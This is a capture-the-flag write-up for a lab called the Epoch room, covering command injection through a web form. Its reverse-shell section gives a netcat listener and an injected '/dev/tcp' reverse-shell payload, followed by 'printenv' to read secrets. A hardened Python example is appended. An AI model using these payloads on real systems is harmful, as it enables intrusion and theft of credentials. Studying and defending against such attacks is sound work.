Author: AMD

This is a writeup for the Epoch room.

My target IP: 10.10.218.15


VISIT WEB PAGE

The room explanation says: “Our website actually just passes your input right along to that command-line program!” If the input reaches a command line unfiltered, we might be able to run commands of our own. So let's try it.

Perfect, we can run commands. Let's find a way to get in.


REVERSE SHELL

Visit https://www.revshells.com/ and use your PC’s IP to handle the configuration.

Run “nc -lvnp 9001” to start the listener.

Input “&sh -i >& /dev/tcp/10.10.244.218/9001 0>&1”


GET THE FLAG

When we look around, we cannot find the flag. Let's look at the hint: “The developer likes to store data in environment variables, can you find anything of interest there?”

Let's try “printenv” to see the environment variables.
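
The two weaknesses this room relies on (input passed straight to a command line, and data kept in environment variables that every child process inherits) can be closed as in the added example below. It is not the room's own code: it assumes the backend converts an epoch timestamp with the `date` utility, and every function name in it is hypothetical.

```python
import re
import subprocess

# Assumption: the backend converts an epoch timestamp with the `date` utility.
EPOCH_RE = re.compile(r"[0-9]{1,12}")
# Minimal environment for children, so secrets in the parent's are not inherited.
CLEAN_ENV = {"PATH": "/usr/bin:/bin", "LC_ALL": "C"}


def vulnerable_command(user_input):
    """The flawed pattern: input spliced into a string later given to `sh -c`."""
    return f"date -d @{user_input}"


def has_shell_operator(text):
    """True if a shell would treat part of the text as control syntax."""
    return any(op in text for op in ("&", ";", "|", "`", "$(", ">", "<", "\n"))


def run_scrubbed(argv):
    """Run argv directly (no shell) with the minimal environment."""
    done = subprocess.run(argv, env=CLEAN_ENV, capture_output=True,
                          text=True, timeout=2, check=True)
    return done.stdout.strip()


def convert_epoch(user_input):
    """Hardened path: strict allowlist first, then an argv list."""
    if not EPOCH_RE.fullmatch(user_input):
        raise ValueError("epoch must be 1 to 12 decimal digits")
    return run_scrubbed(["date", "-u", "-d", f"@{user_input}",
                         "+%Y-%m-%dT%H:%M:%SZ"])


if __name__ == "__main__":
    print(convert_epoch("0"))
```

With the argv list there is no shell to interpret “&”, and with the scrubbed environment a child process has nothing for “printenv” to reveal.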